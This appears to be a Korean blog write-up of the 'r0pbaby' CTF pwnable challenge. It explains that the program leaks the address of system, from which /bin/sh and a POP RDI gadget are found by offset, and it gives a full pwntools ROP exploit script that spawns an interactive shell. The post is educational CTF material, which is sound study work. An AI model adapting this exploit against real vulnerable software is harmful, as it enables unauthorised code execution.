티스토리 뷰
PIE, NX가 걸려있다. 2번 메뉴에서 system 함수의 주소를 구하고 offset을 바탕으로
/bin/sh, gadget의 주소를 구해 익스 할 수 있따.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | from pwn import * p = process('./r0pbaby') #context(arch='amd64',os='linux',endian='little',log_level='debug') p.sendlineafter(': ','2') p.sendlineafter('symbol: ','system') p.recvuntil("Symbol system: ") system = int(p.recv(18),16) binsh = system + 0x1479c7 # offset = binsh - system POP_RDI_RET = system - 0x2428e # offset = system offset - gadgt offset log.success("system : "+hex(system)) log.success("binsh : "+hex(binsh)) log.success("POP RDI RET : "+hex(POP_RDI_RET)) p.sendlineafter(': ','3') p.sendlineafter('max 1024): ','32') payload="A"*8 payload+=p64(POP_RDI_RET) payload+=p64(binsh) payload+=p64(system) p.sendline(payload) p.interactive() | cs |
'Pwnable > write up' 카테고리의 다른 글
P.W.N ctf write up (0) | 2018.11.04 |
---|---|
[PlaidCTF 2014] kappa (0) | 2018.09.26 |
[Sunrin Internel CTF] cee (0) | 2018.09.16 |
[PlaidCTF 2013] ropasaurusrex (0) | 2018.09.16 |
[Codegate2018_quals] BaskinRobins31 (0) | 2018.09.16 |
댓글